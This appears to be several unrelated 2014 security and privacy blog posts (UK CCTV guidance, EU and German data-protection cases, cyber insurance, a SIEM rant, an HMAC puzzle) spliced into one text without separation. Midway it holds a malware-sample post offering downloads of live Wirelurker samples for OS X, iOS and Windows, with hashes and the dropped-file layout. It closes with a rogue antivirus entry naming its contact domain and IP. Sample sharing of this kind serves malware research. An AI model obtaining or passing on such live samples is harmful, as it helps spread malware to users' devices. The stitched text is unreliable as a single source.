On October 15, 2014, the UK Information Commissioner’s Office (“ICO”) published a code of practice regarding the use of surveillance cameras (“Code of Practice”). The Code of Practice explains how the legal requirements of the Data Protection Act 1998 apply to operators of surveillance cameras. Practical and technological advancements have led to a wide variety of surveillance camera technologies that differ from traditional CCTV (e.g., Automatic Number Plate Recognition cameras and body-worn cameras). The Code of Practice addresses (1) changes in technology and (2) inconsistent standards that have arisen in various sectors since the ICO last updated its guidance on CCTV systems, which occurred in 2008. In particular, due to technological advancements, surveillance cameras are no longer merely passive recording devices, but rather can be used to identify specific items or individuals, keep detailed records of events, and are increasingly portable and discrete.

The Code of Practice covers the use of traditional CCTV systems as well as more sophisticated surveillance systems, including:

  • Automatic Number Plate Recognition;
  • Body-worn video;
  • Unmanned aerial systems (e.g., drones); and
  • Other systems that capture information of identifiable individuals.

The Code of Practice provides guidance and good practice tips on key areas for data protection compliance, including (1) the circumstances in which surveillance systems should be used, (2) camera positioning, (3) data subject access requests, (4) data retention and disposal, (5) disclosure of footage to third parties and (6) notifying relevant individuals. In addition, Section 7 of the Code of Practice focuses on more sophisticated surveillance systems such as those that use profiling technology or automatic recognition technology.

The Code of Practice also reflects the wider regulatory environment for surveillance systems, including the Surveillance Camera Code of Practice (“POFA Code”) issued under the Protection of Freedoms Act 2012. Data controllers are encouraged, but not required (except for certain public authorities) to comply with the POFA Code. The ICO Code of Practice is consistent with the POFA Code and cross-references the 12 guiding principles outlined in the POFA Code.

Wirelurker for OSX, iOS (Part I) and Windows (Part II) samples


PART II

Wirelurker for Windows (WinLurker)

Research: Palo Alto Claud Xiao: Wirelurker for Windows

Sample credit: Claud Xiao



PART I


Research: Palo Alto Claud Xiao WIRELURKER: A New Era in iOS and OS X Malware

Palo Alto |Claud Xiao - blog post Wirelurker

Wirelurker Detector https://github.com/PaloAltoNetworks-BD/WireLurkerDetector


Sample credit: Claud Xiao


Download

Download Part I
Download Part II

Email me if you need the password




List of files
List of hashes 

Part II

s+«sìÜ 3.4.1.dmg 925cc497f207ec4dbcf8198a1b785dbd
apps.ipa 54d27da968c05d463ad3168285ec6097
WhatsAppMessenger 2.11.7.exe eca91fa7e7350a4d2880d341866adf35
使用说明.txt 3506a0c0199ed747b699ade765c0d0f8
libxml2.dll c86bebc3d50d7964378c15b27b1c2caa
libiconv-2_.dll 9c8170dc4a33631881120a467dc3e8f7
msvcr100.dll bf38660a9125935658cfa3e53fdc7d65
libz_.dll bd3d1f0a3eff8c4dd1e993f57185be75
mfc100u.dll f841f32ad816dbf130f10d86fab99b1a

zlib1.dll c7d4d685a0af2a09cbc21cb474358595


│   apps.ipa
│   σ╛«σìÜ 3.4.1.dmg

└───WhatsAppMessenger 2.11.7
            libiconv-2_.dll
            libxml2.dll
            libz_.dll
            mfc100u.dll
            msvcr100.dll
            WhatsAppMessenger 2.11.7.exe
            zlib1.dll
            使用说明.txt


Part I

BikeBaron 15e8728b410bfffde8d54651a6efd162
CleanApp c9841e34da270d94b35ae3f724160d5e
com.apple.MailServiceAgentHelper dca13b4ff64bcd6876c13bbb4a22f450
com.apple.appstore.PluginHelper c4264b9607a68de8b9bbbe30436f5f28
com.apple.appstore.plughelper.plist 94a933c449948514a3ce634663f9ccf8
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.itunesupdate.plist 83317c311caa225b17ac14d3d504387d
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.MailServiceAgentHelper.plist e6e6a7845b4e00806da7d5e264eed72b
com.apple.periodic-dd-mm-yy.plist bda470f4568dae8cb12344a346a181d9
com.apple.systemkeychain-helper.plist fd7b1215f03ed1221065ee4508d41de3
com.apple.watchproc.plist af772d9cca45a13ca323f90e7d874c2c
FontMap1.cfg 204b4836a9944d0f19d6df8af3c009d5
foundation 0ff51cd5fe0f88f02213d6612b007a45
globalupdate 9037cf29ed485dae11e22955724a00e7
globalupdate 9037cf29ed485dae11e22955724a00e7
itunesupdate a8dfbd54da805d3c52afc521ab7b354b
libcrypto.1.0.0.dylib 4c5384d667215098badb4e850890127b
libcrypto.1.0.0.dylib 3b533eeb80ee14191893e9a73c017445
libiconv.2.dylib 94f9882f5db1883e7295b44c440eb44c
libiconv.2.dylib fac8ef9dabdb92806ea9b1fde43ad746
libimobiledevice.4.dylib c596adb32c143430240abbf5aff02bc0
libimobiledevice.4.dylib 5b0412e19ec0af5ce375b8ab5a0bc5db
libiodb.dylib bc3aa0142fb15ea65de7833d65a70e36
liblzma.5.dylib 5bdfd2a20123e0893ef59bd813b24105
liblzma.5.dylib 9ebf9c0d25e418c8d0bed2a335aac8bf
libplist.2.dylib 903cbde833c91b197283698b2400fc9b
libplist.2.dylib 109a09389abef9a9388de08f7021b4cf
libssl.1.0.0.dylib 49b937c9ff30a68a0f663828be7ea704
libssl.1.0.0.dylib ab09435c0358b102a5d08f34aae3c244
libusbmuxd.2.dylib e8e0663c7c9d843e0030b15e59eb6f52
libusbmuxd.2.dylib 9efb552097cf4a408ea3bab4aa2bc957
libxml2.2.dylib 34f14463f28d11bd0299f0d7a3985718
libxml2.2.dylib 95506f9240efb416443fcd6d82a024b9
libz.1.dylib 28ef588ba7919f751ae40719cf5cffc6
libz.1.dylib f2b19c7a58e303f0a159a44d08c6df63
libzip.2.dylib 2a42736c8eae3a4915bced2c6df50397
machook 5b43df4fac4cac52412126a6c604853c
machook ecb429951985837513fdf854e49d0682
periodicdate aa6fe189baa355a65e6aafac1e765f41
pphelper 2b79534f22a89f73d4bb45848659b59b
sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36
sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36
sfbase_v4000.dylib 582fcd682f0f520e95af1d0713639864
sfbase_v4001.dylib e40de392c613cd2f9e1e93c6ffd05246
start e3a61139735301b866d8d109d715f102
start e3a61139735301b866d8d109d715f102
start.sh 3fa4e5fec53dfc9fc88ced651aa858c6
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
systemkeychain-helper e03402006332a6e17c36e569178d2097
watch.sh 358c48414219fdbbbbcff90c97295dff
WatchProc a72fdbacfd5be14631437d0ab21ff960
7b9e685e89b8c7e11f554b05cdd6819a 7b9e685e89b8c7e11f554b05cdd6819a
update 93658b52b0f538c4f3e17fdf3860778c
start.sh 9adfd4344092826ca39bbc441a9eb96f

File listing

├───databases
│       foundation
├───dropped
│   ├───version_A
│   │   │   com.apple.globalupdate.plist
│   │   │   com.apple.machook_damon.plist
│   │   │   globalupdate
│   │   │   machook
│   │   │   sfbase.dylib
│   │   │   watch.sh
│   │   │
│   │   ├───dylib
│   │   │       libcrypto.1.0.0.dylib
│   │   │       libiconv.2.dylib
│   │   │       libimobiledevice.4.dylib
│   │   │       liblzma.5.dylib
│   │   │       libplist.2.dylib
│   │   │       libssl.1.0.0.dylib
│   │   │       libusbmuxd.2.dylib
│   │   │       libxml2.2.dylib
│   │   │       libz.1.dylib
│   │   │
│   │   ├───log
│   │   └───update
│   ├───version_B
│   │       com.apple.globalupdate.plist
│   │       com.apple.itunesupdate.plist
│   │       com.apple.machook_damon.plist
│   │       com.apple.watchproc.plist
│   │       globalupdate
│   │       itunesupdate
│   │       machook
│   │       start
│   │       WatchProc
│   │
│   └───version_C
│       │   com.apple.appstore.plughelper.plist
│       │   com.apple.appstore.PluginHelper
│       │   com.apple.MailServiceAgentHelper
│       │   com.apple.MailServiceAgentHelper.plist
│       │   com.apple.periodic-dd-mm-yy.plist
│       │   com.apple.systemkeychain-helper.plist
│       │   periodicdate
│       │   stty5.11.pl
│       │   systemkeychain-helper
│       │
│       └───manpath.d
│               libcrypto.1.0.0.dylib
│               libiconv.2.dylib
│               libimobiledevice.4.dylib
│               libiodb.dylib
│               liblzma.5.dylib
│               libplist.2.dylib
│               libssl.1.0.0.dylib
│               libusbmuxd.2.dylib
│               libxml2.2.dylib
│               libz.1.dylib
│               libzip.2.dylib
├───iOS
│       sfbase.dylib
│       sfbase_v4000.dylib
│       sfbase_v4001.dylib
│       start
│       stty5.11.pl
├───IPAs
│       7b9e685e89b8c7e11f554b05cdd6819a
│       pphelper
├───original
│       BikeBaron
│       CleanApp
│       FontMap1.cfg
│       start.sh
└───update
        start.sh
        update

German Court Asks European Court of Justice if IP Addresses are Personal Data

On October 28, 2014, the German Federal Court of Justice referred the question of whether an IP address constitutes personal data under the EU Data Protection Directive 95/46/EC (“EU Data Protection Directive”) to the European Court of Justice (“ECJ”). The German court referred the question to the ECJ for a preliminary ruling in connection with a case that arose in 2008 when a German citizen challenged the German federal government’s storage of the dynamic IP addresses of users on government websites. The citizen’s claim initially was rejected by the court of first instance. The claim was granted, however, by the court of second instance to the extent it referred to the storage of IP addresses after the users left the relevant government websites. Subsequently, both parties appealed the decision to the German Federal Court of Justice.

The German Federal Court of Justice has suspended the proceedings and referred two questions to the ECJ:

  • Whether, under Article 2A of the EU Data Protection Directive, an IP address is personal data (i.e., any information relating to an identified or identifiable natural person) when the IP address is stored by an Internet service provider(“ISP”) and a third party (e.g., the ISP) possesses sufficient additional data to identify the user.
  • Whether the EU Data Protection Directive is contrary to a provision in the German Telemedia Act. According to the relevant provision of the Telemedia Act, a website provider may collect and process the personal data of users without their consent only to the extent it is necessary to (1) enable the general functionality of the website or (2) arrange payment. In addition, the relevant provision of the Telemedia Act states that enabling the general functionality of the website does not permit user data to be processed after the user closes, or navigates away from, the website.

New Payment Technologies Should Reduce Demand for Cyber Insurance

Hunton & Williams Insurance Litigation & Counseling partner Lon Berk reports:

As the demand for cyber insurance has skyrocketed, so too has the cost. One broker estimates that sales in 2014 will double from the $1 billion premium collected in 2013. Much of the increase in demand and cost has been the result of the widely publicized hacks of the point-of-sale systems at large retailers, and the primary emphasis of most cyber policies is to address liability arising from such events. New payment technologies, however, will change the need for this type of cyber insurance. American Express recently announced a token service; Apple incorporated ApplePay into its new iPhones; and a group of retailers, the Merchant Customer Exchange, is working on the release of a new payment technology as well. These technologies, although different in detail, eliminate the need for merchants to collect unencrypted payment card information from customers, significantly reducing the risk created by point-of-sale malware.

These technologies work by generating tokens or cryptograms for use at the point of sale. Financial institutions are able to determine whether the tokens or cryptograms are associated with a customer’s account, even though it is virtually impossible for a third party possessing the token or cryptogram alone to identify the account. The exact specifics of the technologies vary, but the end result is that the merchant does not need access to the customer’s unencrypted account information and any data obtained through the point-of-sale malware becomes virtually worthless.

As these payment technologies become prevalent in the U.S., the need for cyber insurance protecting retailers against point-of-sale malware should sharply drop. There still will be a need for coverages protecting against other cyber risks, including other forms of malware and security breaches as well as against business interruptions arising from cyber events. However, the need and demand for cyber insurance covering privacy breaches should be reduced and the pressure on much of the current cyber insurance market removed.

SIEM 3.0 – Continuing to Deliver on Failed Promises

SIEM - Security Information and Event Management - has been a product for many, many years now and virtually every organization out there has bought into the promise of what SIEM will bring. Since the term was coined in 2005, the security industry has largely struggled to deliver on all the promises the product family made.


Bring on the Blame

- We can blame marketing professionals who over-hyped the capabilities and wowed buyers with their mastery of buzzwords.
- We can blame the product managers for failing to build coherent features and functionality were based on anything resembling actual use-cases.
- We can blame user interface designers for making products it takes a 40hr course to understand, and a 1,000 page tome to utilize.
- We can blame sales executives for pushing products as solutions when most enterprises simply weren't ready to divert resources into implementation of yet another security project.
- We can blame sales engineers for convincing enterprise security professionals a that a few carefully planned demo scripts could be practically implemented in their environment with any success.
- We can blame CISOs for failing to have a salient security strategy and instead chasing "shiny objects".
- We can blame security professionals for having no grasp of use-cases, or even bothering to fully operationalize one product before moving on to the next like a child with ADHD.

You see, the reality is I think everyone is equally culpable for the state of enterprise security right now. Specifically looking at SIEM, the hysteria has long gone over the back-side of the hype curve so we're forced to create new curves to go over.

Up, Up, and Up Some More

It's like a repetitive cycle, with only one small problem. If we keep setting new and higher expectations through hype after first failing to meet previous expectations it sets the whole thing up for a monumental fall - eventually. You see, we haven't yet fallen down the back-side of the hype curve...not totally. Every time we do someone invents another term.

Case in point, "SIEM 2.0" and associated silliness. Why did we need the term SIEM 2.0? I honestly didn't know what it meant so I asked a few people whose business it was to build, sell, or operationalize SIEM. The answer I heard the most often was this:
"SIEM 2.0 is another attempt at SIEM. The first time we barely got the log aggregation. This time we're going to try and achieve correlation."
Mind. Exploded.

So if I understand this, SIEM 2.0 is a term created because SIEM has miserably failed to deliver value, based on what it was sold as. Am I getting this right?

At this point, the hype knob goes to 12. I've heard a SIEM can be leveraged to detect fraud, APTs, botnets, malicious insiders, and behavioral anomalies. SIEMs are local appliances, virtual images, cloud-based, and of course leverage "big data". SIEMs feature log collection, aggregation, correlation, analysis and custom rules development. Did I miss anything?

Analysts, Leaders, Visionaries, and Execution

What really boils my bunny is every time one of these mystic quadrants shows up I sit and scratch my head and wonder how these things are done. Clearly the analysts haven't talked to any real users of the products because they would hear the same things I do - disappointment, anger, and disillusionment.

What separates a leader from a visionary? The ability to execute? And if that's true - how do we define successful execution? What test-cases are we using and who gets to determine succeed or fail?

Completeness of vision is great, but failure to execute makes that worthless. On the the other side of that coin, execution is brilliant unless you're executing on dated and undesirable features. Where do we factor in the success KPIs?

The security professionals and executives I talk to have a clear emphasis on execution. Make it work. Make it do what it's supposed to do. Make it relatively operational with minimum additional resources, since that's the point after all isn't it?

Actually that's an interesting point - what does the enterprise security professional expect from their SIEM product? What are the use-cases that are most useful to the broadest enterprise community? What features and functions could we simply throw away without anyone noticing - because no one uses them?

Does being a leader mean you are telling your customers and end-users what they should be doing? Or is that the role of the visionary? Who is really driving this bus?

On Point

So let me close this post out with a proposal. How about we start over, again, for the first time. Let's call it SIEM 3.0, or Next-Gen SIEM, or SIEM Type-R (R for reinvented). I don't care what you call it, but let's start by getting together some focus groups of enterprises large and small. Let's get them talking, building use-cases and then let's define products, services and operational strategy around that. Once you've got the thing going, let's talk about maintenance, management, and operationalizing the thing so that the number of systems submitting logs doesn't mysteriously drop over time, or the blinking alerts don't go un-noticed or un-actioned.

Maybe once we get past all the failed promises, we can start to develop real and useful tools that help security rather than hinder it. It's clear to me that enterprise security professionals spend way too much time fighting the technology that's supposedly helping them, which leaves little time to fight the actual bad guys. Security suffers from an operational problem, not a tools problem. The tools are there, just the operational processes and methodologies are missing, poorly developed, or just plain broken.

This thought needs further development - but this has been bugging me long enough so that I finally had to sit down and write it out. I hope you found some useful points amongst the ranting.

Federal District Court Grants Motion to Dismiss a Class Action Alleging Impermissible Sharing of Personal Information Under the Video Privacy Protection Act

On October 8, 2014, the United States District Court for the Northern District of Georgia granted Cartoon Network, Inc.’s (“Cartoon Network’s”) motion to dismiss a putative class action alleging that Cartoon Network’s mobile app impermissibly disclosed users’ personally identifiable information (“PII”) to a third party data analytics company under the Video Privacy Protection Act (“VPPA”).

Cartoon Network’s mobile app allowed consumers to view video content via their mobile device. Each time a user accessed the mobile app, the app would disclose the user’s Android ID and “a complete record of the user’s video history” to a third party data analytics company that specialized in tracking users across mobile apps and websites. An Android ID is a “randomly generated number that is unique to each user and device.” According to the complaint, the disclosures of customers’ viewing records occurred without consumer consent and violated the VPPA.

In granting Cartoon Network’s motion to dismiss, the court stated the information disclosed to the data analytics company was not PII and thus, there was no violation of the VPPA. The VPPA defines PII as “information which identifies a person as having requested or obtained specific video materials or services from a video tape service provider.” According to the court, an Android ID (coupled with video viewing history) is not PII because it does not identify a specific person. Although the plaintiffs alleged that the analytics company was able to connect specific individuals to Android IDs provided by Cartoon Network through information obtained from other sources, the court dismissed the complaint stating that the analysis focuses on the information disclosed, not on what the recipient is able to do with the information.

“One-Stop-Shop” Under the Proposed EU Regulation: A Way Forward

This week, the Article 29 Working Party (“Working Party”) prepares to debate various proposals on the “one-stop-shop” mechanism under the proposed EU General Data Protection Regulation (“Regulation”). Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership submitted a strategy paper on the one-stop-shop to the Working Party. The paper proposes a methodology for selecting and defining the role of a lead regulatory authority with the objective of making the one-stop-shop more operational, flexible and viable. The work draws on a more detailed article published on November 3, 2014, by Hunton & Williams senior attorney Rosemary Jay in the magazine for the Society for Computers and Law, entitled The “One Stop Shop” – Working in Practice.

In the article, Jay argues that the currently endangered one-stop-shop arrangements under the Regulation can be rescued and made effective by the adoption of a more flexible and balanced methodology. Under the current text of the Regulation, a data controller with operations in more than one EU Member State will be subject to the lead supervision of the regulatory authority for the Member State in which it has its “main establishment.” This raises concerns that (1) regulatory authorities without lead supervision may lose influence over data protection issues that affect citizens in their Member States, (2) the regulatory authority with lead supervision may be removed from individuals affected by the data controller’s processing activities, (3) businesses may “forum shop,” to obtain their preferred lead regulatory authority and (4) orders by lead regulatory authorities may be unenforceable in other Member States. Jay addresses these issues simply and effectively by making the one-stop-shop elective rather than automatic, and more tailored to specific business models.

In an elective system, a business must apply for a lead regulatory authority. To have its application approved, the business must represent that it will comply with the lead regulatory authority’s orders across its businesses in all EU Member States. The application process also could involve discussions with non-lead regulatory authorities and incorporate specific arrangements to resolve their reservations or concerns. The one-stop-shop could be implemented gradually to accumulate experience and facilitate a more streamlined application process as implementation of the one-stop-shop progresses.

When launching the Regulation, the European Commission indicated that the one-stop-shop would benefit businesses operating among several EU Member States. Those working in privacy and data protection across Europe are hopeful that the Working Party’s deliberations can rescue the one-stop-shop concept to realize the benefits previously announced by the European Commission.

FFIEC Announces Plans to Update Cybersecurity Guidance in Wake of Cybersecurity Assessments

On November 3, 2014, the Federal Financial Institutions Examination Council (“FFIEC”), on behalf of its members, released a report entitled FFIEC Cybersecurity Assessment General Observations (the “Report”) that contains observations from recent cybersecurity assessments conducted at over 500 community financial institutions as part of the FFIEC cybersecurity examination work program. The Report summarizes themes from the assessments and provides suggested questions for chief executive officers and boards of directors to ask when assessing their institutions’ cybersecurity preparedness. In light of the assessments, the FFIEC announced that its members will review and update current FFIEC cybersecurity guidance.

Based on the assessments, the FFIEC observed that the level of cybersecurity inherent risk varies significantly across financial institutions, in part due to the various types of network connections, products and services, and technologies used by financial institutions. The Report also contains observations on the overall cybersecurity preparedness of financial institutions, including findings on the current risk management, governance, threat intelligence, cybersecurity controls, incident response, and third party management practices of financial institutions.

Additionally, the FFIEC emphasized the importance of information sharing, noting that “[p]articipating in information sharing forums (e.g., Financial Services Information Sharing and Analysis Center) is an important element of a financial institution’s risk management processes and its ability to identify, respond to, and mitigate cybersecurity threats and incidents.” The FFIEC also recommended in a separate statement that financial institutions of all sizes participate in the Financial Services Information Sharing and Analysis Center as part of their process to identify, respond to, and mitigate cybersecurity threats and vulnerabilities.

Thought experiment on protocols and noise

I hesitate to call this an interview question because I don’t think on-the-spot puzzle solving equates to a good engineering hire. On the other hand, I try to explore some simple thought experiments with candidates that have a security background.

One of these involves a protocol that has messages authenticated by an HMAC. There’s a message (with appropriate internal format) and a SHA-256 HMAC that covers it. As the implementer, you receive a message that doesn’t verify. In other words, your calculated MAC isn’t the same as the one in the message. What do you do?

“Throw an error” is a common response. But is there something more clever you could do? What if you could tell whether the message had been tampered with or if this was an innocent network error due to noise? How could you do that?

Some come up with the idea of calculating the Hamming distance or other comparison between the computed and message HMACs. If they are close, it’s unlikely that the message had been corrupted, due to the avalanche property of secure hash functions. If not, it may be a bit flip in the message, possibly due to an attack.

Ok, you can distinguish whether the MAC had a small number of errors or the message itself. Is this helpful, and is it secure? Consider:

  • If you return an error, which one do you return? At what point in the processing?
  • Does knowing which type of error occurred help an attacker? Which kind of attacker?
  • If you chose to allow up to 8 flipped bits in the MAC while still accepting the message, is that secure? If so, at what number of bits would it be insecure? Does the position of the bits matter?

There comes a moment when every engineer comes up with some “clever” idea like the above. If she’s had experience attacking crypto, the next thought is one of intense unease. The unschooled engineer has no such qualms, and thus provides full employment for Root Labs.

Supreme Court of Canada Extends Deadline for Amending Alberta PIPA

On October 30, 2014, the Supreme Court of Canada extended the deadline for the province of Alberta to amend its Personal Information Protection Act (“PIPA”). In November 2013, the Supreme Court of Canada declared PIPA invalid because it interfered with the right to freedom of expression in the labor context under Section 2(b) of the Canadian Charter of Rights and Freedoms. The Supreme Court of Canada gave the Alberta legislature 12 months to determine how to make the legislation constitutionally compliant, which it apparently failed to do. The new deadline for amending PIPA is May 2015.

Alberta’s Information and Privacy Commissioner Jill Clayton applauded the extension of the deadline. Commissioner Clayton had sent a letter to Alberta’s Premier, Minister of Justice and Solicitor General, and Minister of Service in September 2014 expressing her concern that the Alberta legislature would “not be able to act to preserve PIPA before it lapses.” She also highlighted the “unique benefits” of PIPA in the letter, including breach notification to affected individuals, local enforcement without the involvement of courts, and the protection of employee privacy rights.

Spyware Defender

Spyware Defender is a fake Antivirus tool. It detects fake infections and displays alert messages, to scare users. Pushing them into installing and buying a license of the rogue.




It contacts spyware-defender.com (212.7.218.11).
Thanks to @kafeine for the sample